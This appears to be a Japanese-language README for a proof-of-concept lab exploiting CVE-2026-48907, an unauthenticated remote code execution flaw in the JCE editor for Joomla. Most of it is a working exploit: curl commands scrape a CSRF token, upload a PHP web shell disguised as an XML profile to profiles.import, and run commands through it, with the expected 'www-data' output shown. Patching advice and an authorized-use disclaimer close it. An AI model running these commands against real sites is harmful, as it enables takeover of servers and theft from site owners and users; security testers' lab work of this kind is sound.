
CVE-2026-48907 の POC
PSsec CVE-2026-48907 の教育用セキュリティ研究ラボ。
CVE-2026-48907 は、Joomla で最も広く導入されているエディタ拡張機能である JCE (Joomla Content Editor) における、重大 (CVSS 10.0) な未認証リモートコード実行の脆弱性であり、すべてのバージョン ≤ 2.9.99.4 に影響します。
profiles.import エンドポイントは、認証なしでファイルアップロードを受け付けます。攻撃者は、XML プロファイルを装った悪意のある PHP ファイルをアップロードでき、そのファイルはサーバーの tmp/ ディレクトリに書き込まれ、HTTP 経由で直接実行されます — 資格情報は不要です。
| 詳細 | 値 |
|---|---|
| CVE | CVE-2026-48907 |
| CVSS スコア | 10.0 重大 |
| 影響を受けるバージョン | JCE ≤ 2.9.99.4 |
| 修正済みバージョン | JCE ≥ 2.9.99.5 |
| CISA KEV 登録 | はい — 2026年6月16日 |
| 積極的に悪用されている | はい |
docker compose up -d
ブラウザで http://localhost:8080 を開き、以下の資格情報を使用してセットアップウィザードを完了します:
| フィールド | 値 |
|---|---|
| データベースホスト | db |
| データベース名 | joomla |
| データベースユーザー | joomla |
| データベースパスワード |
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
次に、Joomla 管理画面 → システム → 拡張機能 → インストール → ZIP をアップロードします。
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
| sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
| head -n1)
curl -i -s -b cookies.txt -c cookies.txt \
-F "[email protected];type=application/xml" \
-F "task=profiles.import" \
-F "${TOKEN}=1" \
"$URL/index.php?option=com_jce"
curl -i -s -b cookies.txt -c cookies.txt \
"$URL/tmp/shell.xml.php?cmd=id"
期待される出力: uid=33(www-data) gid=33(www-data)
| ファイル | 説明 |
|---|---|
docker-compose.yml | 脆弱な Joomla 5.3.1 + MySQL 8.0 を起動します |
shell.xml.php | 最小限の PHP ウェブシェルペイロード |
instructions.txt | ステップバイステップの悪用手順メモ |
直ちに JCE を バージョン 2.9.99.5 以降 に更新してください。
公式ベンダーアドバイザリと旧バージョンの Joomla 向け無料パッチ: JCE セキュリティ更新 — joomlacontenteditor.net
このリポジトリは、教育目的および許可されたセキュリティ研究専用 です。
テストは、所有している、または明示的な書面による許可を得た システムに対してのみ実施してください。所有していないシステムに対するこの資料の不正使用は、違法かつ非倫理的です。著者および Pansophical OU は、このコンテンツの誤用について一切の責任を負いません。
このラボ環境は意図的に脆弱です。インターネットや信頼できないネットワークに公開しないでください。
PSsec 著
joomlapass